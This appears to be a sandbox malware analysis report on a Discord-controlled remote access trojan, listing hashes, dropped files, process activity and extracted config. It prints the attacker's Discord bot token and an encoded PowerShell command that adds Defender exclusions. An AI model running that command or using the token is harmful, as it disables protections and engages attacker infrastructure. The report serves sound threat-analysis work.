discordrat | 9258d993b240a43e7c595db26b9f04a7e620a240a2ade29ab1daff528462a517

Analysis

max time kernel
131s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09/03/2024, 12:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

26.9MB
MD5

f6d14262dedf30fe406a6a83bc285848
SHA1

8fcffcb218cb7b759a26c3125d03246c9eb60308
SHA256

9258d993b240a43e7c595db26b9f04a7e620a240a2ade29ab1daff528462a517
SHA512

51075d388a5c280c999c37d182de08e4989f8ad2af4bb02c012c5f0e5fe5be99ea5579e3adab6e29653798110f77af9c78328aca7e9ac4054b4a8753ca01cad7
SSDEEP

393216:vW3AUWON8SUpFLkl5J3TEaQMlPpSEh58UEmnoFDki+4Cs/nhKDX+m64qHIsn6P:+OOtUAljoaFfSAhr2Cs5KDXvqH3n6

Score

10^/10

discordrat persistence pyinstaller rat rootkit stealer upx

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIwNDk0MjY0MDY0MzMxMzc0NQ.G2mhX6.W77F5TMZuCC1U8GHoOD8TxwembX1ccz-N2lX0U
server_id
1205273351032143953

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Executes dropped EXE 6 IoCs

pid	Process
3004	Run.exe
2936	Test (2).exe
468	Test.exe
1276	Test.exe
1528	Test (2).exe
1200	Process not Found

Loads dropped DLL 14 IoCs

pid	Process
2472	Setup.exe
2472	Setup.exe
2472	Setup.exe
468	Test.exe
2936	Test (2).exe
1528	Test (2).exe
1276	Test.exe
1200	Process not Found
1200	Process not Found
2224	WerFault.exe
2224	WerFault.exe
2224	WerFault.exe
2224	WerFault.exe
2224	WerFault.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001a490-181.dat	upx
behavioral1/files/0x000500000001c863-180.dat	upx
behavioral1/files/0x000500000001c863-183.dat	upx
behavioral1/files/0x000500000001a490-182.dat	upx
behavioral1/memory/1528-187-0x000007FEF3960000-0x000007FEF3DCE000-memory.dmp	upx
behavioral1/memory/1276-188-0x000007FEF34F0000-0x000007FEF395E000-memory.dmp	upx

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Saved Games\Microsoft Games\desktop.ini	solitaire.exe

Detects Pyinstaller 5 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000800000001227e-10.dat	pyinstaller
behavioral1/files/0x000800000001227e-13.dat	pyinstaller
behavioral1/files/0x000800000001227e-12.dat	pyinstaller
behavioral1/files/0x000800000001227e-179.dat	pyinstaller
behavioral1/files/0x000800000001227e-193.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats	solitaire.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats\{8669ECE8-D1C3-4345-8310-E60F6D44FDAF}\LastPlayed = "0"	solitaire.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats\{8669ECE8-D1C3-4345-8310-E60F6D44FDAF}	solitaire.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings	solitaire.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software	solitaire.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft	solitaire.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows	solitaire.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX	solitaire.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2600	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1276	Test.exe
2436	solitaire.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2600	powershell.exe
Token: 33	2992	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2992	AUDIODG.EXE
Token: 33	2992	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2992	AUDIODG.EXE

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 2472 wrote to memory of 2600	2472	Setup.exe	28
PID 2472 wrote to memory of 2600	2472	Setup.exe	28
PID 2472 wrote to memory of 2600	2472	Setup.exe	28
PID 2472 wrote to memory of 2600	2472	Setup.exe	28
PID 2472 wrote to memory of 3004	2472	Setup.exe	30
PID 2472 wrote to memory of 3004	2472	Setup.exe	30
PID 2472 wrote to memory of 3004	2472	Setup.exe	30
PID 2472 wrote to memory of 3004	2472	Setup.exe	30
PID 2472 wrote to memory of 2936	2472	Setup.exe	31
PID 2472 wrote to memory of 2936	2472	Setup.exe	31
PID 2472 wrote to memory of 2936	2472	Setup.exe	31
PID 2472 wrote to memory of 2936	2472	Setup.exe	31
PID 2472 wrote to memory of 468	2472	Setup.exe	32
PID 2472 wrote to memory of 468	2472	Setup.exe	32
PID 2472 wrote to memory of 468	2472	Setup.exe	32
PID 2472 wrote to memory of 468	2472	Setup.exe	32
PID 468 wrote to memory of 1276	468	Test.exe	33
PID 468 wrote to memory of 1276	468	Test.exe	33
PID 468 wrote to memory of 1276	468	Test.exe	33
PID 2936 wrote to memory of 1528	2936	Test (2).exe	34
PID 2936 wrote to memory of 1528	2936	Test (2).exe	34
PID 2936 wrote to memory of 1528	2936	Test (2).exe	34
PID 3004 wrote to memory of 2224	3004	Run.exe	35
PID 3004 wrote to memory of 2224	3004	Run.exe	35
PID 3004 wrote to memory of 2224	3004	Run.exe	35

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAeQBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAcwBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdgB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AeQBzACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2600
- C:\Users\Admin\AppData\Local\Temp\Run.exe
  "C:\Users\Admin\AppData\Local\Temp\Run.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3004 -s 596
    3⤵
    - Loads dropped DLL
    PID:2224
- C:\Users\Admin\AppData\Local\Temp\Test (2).exe
  "C:\Users\Admin\AppData\Local\Temp\Test (2).exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Users\Admin\AppData\Local\Temp\Test (2).exe
    "C:\Users\Admin\AppData\Local\Temp\Test (2).exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1528
- C:\Users\Admin\AppData\Local\Temp\Test.exe
  "C:\Users\Admin\AppData\Local\Temp\Test.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:468
- - C:\Users\Admin\AppData\Local\Temp\Test.exe
    "C:\Users\Admin\AppData\Local\Temp\Test.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: GetForegroundWindowSpam
    PID:1276

C:\Program Files\Microsoft Games\solitaire\solitaire.exe
"C:\Program Files\Microsoft Games\solitaire\solitaire.exe"
1⤵
- Drops desktop.ini file(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2436

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x504
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Test (2).exe

Filesize
2.0MB

MD5
2af4061d890846d17060701e62ae6e93

SHA1
2c770c092a0ad0c18b233126cdf456e0d6ff14b7

SHA256
56daaf3356d557d6685182de943e3668e1d255cf618922c1063b4e964f2038f3

SHA512
1295e9603771fa3feaefcaa6a0ea90aae5e4e3a0eb7011fbb445c1f2eb434213797145090c10de999717db87cdc1f057236b12d93bc2886131ae861637a6a27b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Test (2).exe

Filesize
1.8MB

MD5
4291f0c85d02e37aa173a044ec6afcdc

SHA1
9e51e2d5fe54b82bffc6404a98ff78e9921bd4bf

SHA256
72b61114e4a713857eb0236a8de2d817d072e9630cb0a1dcb1566e13cff7ca27

SHA512
9c61f1c42e16f1c54aebae14d1fc0a058ff0941b1126e3feb1b6e2f74b5e6a94a27317726858e4711d48b55f59d07e74a83487eb35f962f61f6c1a61f1cde0b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Test (2).exe

Filesize
640KB

MD5
5f9d6ece175e06dee97948d84c62e073

SHA1
1ff39183fd2ae3427effa697beeebcb7ddc55cd2

SHA256
f2303f6fc029b88c65e01ff5d11f7c872689e93086ca31fbd0573bf61c1c57fd

SHA512
00ee27d7693e1c20a1d0845b79e2d826c8ac1521882359489530a1b6ad77530963889b92d536ad7692aada46bd73ddabca9fe0fdaa1d2c925ea49ef080335e55

Download Submit
C:\Users\Admin\AppData\Local\Temp\Test.exe

Filesize
1.5MB

MD5
dee5db32e69c12bf0a757d6f242c9496

SHA1
2367e082e40a29a0b39369bfcc175bfe64096eab

SHA256
80d1a2f37a1202976b9570dc7c6c726b14bd0321a5c104807930d7d099b3d91f

SHA512
9045be2efd22eeef03c94df08685fb019ca636674714e3377e74e36724c17baf152316bf9fdd0f602bafad5810360c6f4edc1d900d3b2f64aab224c650e9a9bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Test.exe

Filesize
128KB

MD5
8f0e8b004c316c697152271e4a581bf8

SHA1
26e8eca220f5532f21a9553780f931ec0e05191a

SHA256
3936562e9c36551c6fc08e7f9e667168f2cdd20b66210eba3d17886fa9e5c7c7

SHA512
77f4adb917bdb7ffb4efc54f3861d824ed02b7c583974534328ab5ea7fe21ad237c39275d2eae649331b836548f5d4f0056ce8c2aed239a31911a1f9bf05d682

Download Submit
C:\Users\Admin\AppData\Local\Temp\Test.exe

Filesize
86KB

MD5
31b53c965eed05b15682c6405ed55b6e

SHA1
56dfba4cc611f282b6f57297f468633db1c4002c

SHA256
6e09b5780a755e445a4124ef97055edceee3bba46b14c18717450286d22465b7

SHA512
17c91d20c147f06775ac5ff85911ad26bcc43990f7299545d269e894d3c0207069e938fac93671955f5cf34c6ea802420194411799c518bdf8948e71860dd63a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29362\python310.dll

Filesize
640KB

MD5
2419dff7a302d83713618e5ed166ad1b

SHA1
208bb4a375c578c5ea0b0f17ccf945f5fb7b0461

SHA256
1467a950028a7bbe52210e14ae6f2555852f1f397b670c133d47ec60deeda357

SHA512
7ba3ec30922fce68176e2825d6c37966fee2f019d5522c3c58297ea8407171cdacca60f73c2f5169672a18b5f85869adba0a7f6d7e9d5fd950b615575f2e3c8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29362\setuptools-65.5.0.dist-info\INSTALLER

Filesize
4B

MD5
365c9bfeb7d89244f2ce01c1de44cb85

SHA1
d7a03141d5d6b1e88b6b59ef08b6681df212c599

SHA256
ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

SHA512
d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI4682\python310.dll

Filesize
640KB

MD5
60666fe1040aae3ecbdef82987afea01

SHA1
8752e107d63c875a55e13d0bd592a15d539b3662

SHA256
3d24eb9147ca2a7812c04b134dc891e2cf7ffe0102e46de207078f98c5f62b9e

SHA512
993ee4c47095631b24ba6e7402fc20d70a8812837ac9b2f991dc6fc938a7dda8e656fda69fee3c6f5271895a88e67ce1fb68c0afeaecc8fa48259b2489853742

Download Submit
\Users\Admin\AppData\Local\Temp\Run.exe

Filesize
8KB

MD5
7d6a68273a8a4c6865e335fe7b3f1edd

SHA1
56683fb683b9e6eafc8ccfe63ce3c8ad636e468d

SHA256
e0d3bc592f4cda5462e1a1115d266fea01b9a9b59134e67a3431520bdcfc0091

SHA512
4817ab67cec2def533672ccdd917938d23d0d7037ab0df07f3179725126a72931c9ec41b7fbe4a09d764649bf37369944132b416a903bc305c22440c68e7c56c

Download Submit
\Users\Admin\AppData\Local\Temp\Run.exe

Filesize
78KB

MD5
da55323342e95b551c35bdacfe00529f

SHA1
5239b5b6087e453547435c4784a9b00fb6d0b482

SHA256
9700f5eb933349c709fd86994da9c744e4a27c54fdf4565fd1c3f0f3e9b0bab8

SHA512
8117b2f7757ebe68b9e6c27dd7d6f39c79cac71a01500d18f3f35440c8502b95c8c4cda80e064897d4b356d439311923f28af84bee53985fe6798f1308ac8940

Download Submit
\Users\Admin\AppData\Local\Temp\Test (2).exe

Filesize
3.6MB

MD5
bcec453ae3dd2444e86c1e409ed10ba2

SHA1
781c46213f5eee2f31f63200faf1b4ec4ec6314e

SHA256
35038b85b94286e8d8e004d85b06022b3a137ec75e417a677f404d834b8361c1

SHA512
ffe1d9b1a9d067e7c75cb5cb4b50936b5c35d816e35ffc0354fed4a9443f02369d2b821f5e2bc327f837c587b109a71a527dc4e058f2a692a9510873be40e43d

Download Submit
\Users\Admin\AppData\Local\Temp\Test (2).exe

Filesize
1.4MB

MD5
fa5eaae26b109d1a99e9e94cd57d1f03

SHA1
a8bf27a5483b2bdd3ef58d79fc9b7dd4505a22df

SHA256
be6575e71df6cc186af96fef0da5d7fe747ce4d564a775ebe1bcbd2fcac699f0

SHA512
945ab06686c075a21641c39aaf37b9c4e08954271bda6ef50dfda7f79975bce4b89da15746b5476a3622c158f3ffe5929ec55762094eb730f95dd4707fc8f111

Download Submit
\Users\Admin\AppData\Local\Temp\Test.exe

Filesize
1.8MB

MD5
9e6d59b5163cb3b136137196c33294ad

SHA1
ec8da9928c1775202657c33dd4afe77d7847084a

SHA256
8b12ec4cc2b02cec3b71567c29417eb9701a2e17a04f9f483458908f81851fbc

SHA512
ff719797d97511c59927bc84f43d85341fd191bb637d94186ecbf78d81da5fe6d97a48da874589cd4b760a474346122eb123d8d934deffab564b08379d7db20c

Download Submit
\Users\Admin\AppData\Local\Temp\Test.exe

Filesize
576KB

MD5
5959907030b5afc8d8b0972b00877fdd

SHA1
18fd4a8e0e41de9479ca0309a608094ab4d3935b

SHA256
0e4b364a40e45906027100ae29cf25293ec69a0f3911b84ce460cc97d9c9a09a

SHA512
22d55c5c837fdd96751d458d7802f5554ddbeff1779ee0b609c175b0188ed4301a78ff423ac2bc17514985515d9f67fa9edd8b06b0b15f8a036c1f1424eed242

Download Submit
\Users\Admin\AppData\Local\Temp\Test.exe

Filesize
512KB

MD5
c9ef8eb289949be39ea078228aa4ebba

SHA1
682f84d4eff4d8613ef5218b5b189103c6be2170

SHA256
a130d35247eeb5e3bd70834ef9866e5b238028b85a19b26178729a81c8d7cffc

SHA512
84b6c39feda52ebba963b1c3a9b6ce69dcf9df9807761e36a89bd77554c0352fbe677a61df90729b0e67c0f404a22cd55304822b4aa2a97d4953b8abc2020e93

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI29362\python310.dll

Filesize
1.4MB

MD5
69d4f13fbaeee9b551c2d9a4a94d4458

SHA1
69540d8dfc0ee299a7ff6585018c7db0662aa629

SHA256
801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046

SHA512
8e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI4682\python310.dll

Filesize
768KB

MD5
3e595060e476451204f0685f007ca9c1

SHA1
80d6dba2cc30c27b52719ce1b94292224b1dbf4b

SHA256
350d5e41398195957d835018eacc4d50c94630bbca7a193bfbe2c813373242a6

SHA512
e6314ce325c6786d2c32256a27034e697f4c38f6cbc0764dffa1987f8f51223969880012c4bb389b9a8f773a2a03505fcb4bb4f1863f076e4651917363adcc34

Download Submit
memory/1276-188-0x000007FEF34F0000-0x000007FEF395E000-memory.dmp

Filesize
4.4MB

Download
memory/1528-187-0x000007FEF3960000-0x000007FEF3DCE000-memory.dmp

Filesize
4.4MB

Download
memory/2436-348-0x000007FEF5A50000-0x000007FEF5B81000-memory.dmp

Filesize
1.2MB

Download
memory/2436-357-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-364-0x000007FEF5A50000-0x000007FEF5B81000-memory.dmp

Filesize
1.2MB

Download
memory/2436-362-0x0000000001E30000-0x0000000001E3A000-memory.dmp

Filesize
40KB

Download
memory/2436-363-0x0000000001E30000-0x0000000001E3A000-memory.dmp

Filesize
40KB

Download
memory/2436-361-0x0000000001E30000-0x0000000001E3A000-memory.dmp

Filesize
40KB

Download
memory/2436-360-0x0000000001E30000-0x0000000001E3A000-memory.dmp

Filesize
40KB

Download
memory/2436-359-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-358-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-356-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-337-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-336-0x0000000001C70000-0x0000000001C71000-memory.dmp

Filesize
4KB

Download
memory/2436-338-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-339-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-340-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-341-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-342-0x0000000001E30000-0x0000000001E3A000-memory.dmp

Filesize
40KB

Download
memory/2436-343-0x0000000001E30000-0x0000000001E3A000-memory.dmp

Filesize
40KB

Download
memory/2436-344-0x0000000001E30000-0x0000000001E3A000-memory.dmp

Filesize
40KB

Download
memory/2436-355-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2436-350-0x0000000000120000-0x0000000000220000-memory.dmp

Filesize
1024KB

Download
memory/2436-353-0x0000000001C70000-0x0000000001C71000-memory.dmp

Filesize
4KB

Download
memory/2436-354-0x0000000001C80000-0x0000000001C8A000-memory.dmp

Filesize
40KB

Download
memory/2600-189-0x0000000072EE0000-0x000000007348B000-memory.dmp

Filesize
5.7MB

Download
memory/2600-333-0x0000000072EE0000-0x000000007348B000-memory.dmp

Filesize
5.7MB

Download
memory/2600-185-0x00000000020E0000-0x0000000002120000-memory.dmp

Filesize
256KB

Download
memory/2600-186-0x0000000072EE0000-0x000000007348B000-memory.dmp

Filesize
5.7MB

Download
memory/2600-190-0x00000000020E0000-0x0000000002120000-memory.dmp

Filesize
256KB

Download
memory/3004-61-0x000000013F5A0000-0x000000013F5B8000-memory.dmp

Filesize
96KB

Download
memory/3004-335-0x00000000007E0000-0x0000000000860000-memory.dmp

Filesize
512KB

Download
memory/3004-334-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

Filesize
9.9MB

Download
memory/3004-184-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

Filesize
9.9MB

Download
memory/3004-194-0x00000000007E0000-0x0000000000860000-memory.dmp

Filesize
512KB

Download